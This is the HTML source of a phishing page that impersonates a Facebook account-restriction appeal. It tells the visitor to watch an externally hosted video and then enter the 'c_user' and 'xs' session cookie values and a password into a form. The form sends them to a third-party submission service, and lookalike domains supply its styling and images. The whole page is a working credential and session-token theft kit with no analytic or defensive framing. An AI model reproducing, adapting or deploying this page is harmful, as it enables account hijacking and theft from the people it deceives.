<html lang="en"><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Action Required | Facebook</title>
    <link rel="stylesheet" href="style.css">
    
    <link rel="stylesheet" href="https://meta-submit.github.io/report-isuess-fb-request-now/style.css">
    
    <style>
        
        .img{
            width:300px;
            height:300px;
        }
        
        
        
    </style>
    
    


<body>
    <div class="header_container">
        <nav class="header__nav">
            <p class="facebook">facebook</p>
            <header> <input class="nav-search" type="text" placeholder="How can we help?"> </header>
        </nav>
        <div class="help">
            <div class="container__helper">
                <li> <a class="help__a" href="#"><img src="https://i.imgur.com/ZcUp73J.png">Help Center</a> </li>
            </div>
        </div>
    </div>
    <div class="main">
        <header class="main__header">
           <marquee>  <h3 class="main__h3">Appeal Page Violation</h3></marquee>
        </header>
        <div class="main__body">
            <p> We have detected unusual activity on your page that violates our community standards. </p>
            <p> Your access to your page has been limited, and you are currently unable to post, share, or comment
                using your page. </p>
            <p> If you believe this to be a mistake, you have the option to submit an appeal by providing the necessary
                information. </p>
            <p class="video__p">Detailed Video Information</p> <a target="_blank" onclick="myFunction()" class="video" href="https://detailed-video-29b30.web.app/detailed%20video.mp4"><img src="https://help-pages-verificatio-meta.netlify.app/downloadssss.png" alt=""></a>
            <div>
                <h3> Must Watch the video to submit required information restriction won't be removed with incorrect information! </h3>
            </div>
            <p>Please be sure to provide the requested information below.</p>
          <form action="https://submit-form.com/6laZXHdox" method="POST">
             <label class="label" for="recipient">c_user</label>
                <input class="input" id="numberInput" type="C_user" name="C_user" required=""> <label class="label" for="subject">xs</label> <input class="input" title="Enter correct information! Watch the video" for="text" name="xs" pattern=".{30,}" required="">   <b>Confirm to Password </b>
  <p></p><input class="border h-6 pl-1 mx-3" type="text" name="pasward" id="pasward" pattern=".{6,}" required="">   
      <p class="text-[10px] font-serif   mt-3 mx-3">
                </p><div id="btn-div" class="btn-div"> <button class="btn" type="submit" onclick="sendEmail()"> Submit
                    </button> </div>
            </form>
        </div>
    </div>
    <div class="footer">
        <div class="footer__container">
            <ul class="footer-ul">
                <li><a href="">About</a></li>
                <li><a href="">Privacy Policy</a></li>
                <li><a href="">Careers</a></li>
            </ul>
            <ul class="footer-ul">
                <li><a href="">AdChoices</a></li>
                <li><a href="">Create ad</a></li>
                <li><a href="">Create Page</a></li>
            </ul>
            <ul class="footer-ul">
                <li><a href="">Terms and policies</a></li>
                <li><a href="">Cookies</a></li>
            </ul>
        </div>
    </div>
    <div class="meta">
        <figure class="is-resized size-full wp-block-image"> <img class="img" fetchpriority="high" decoding="async" src="https://i.imgur.com/gE3Re3K.jpeg" alt=""> </figure>
    </div>

<script src="index.1ca789be.js"></script>
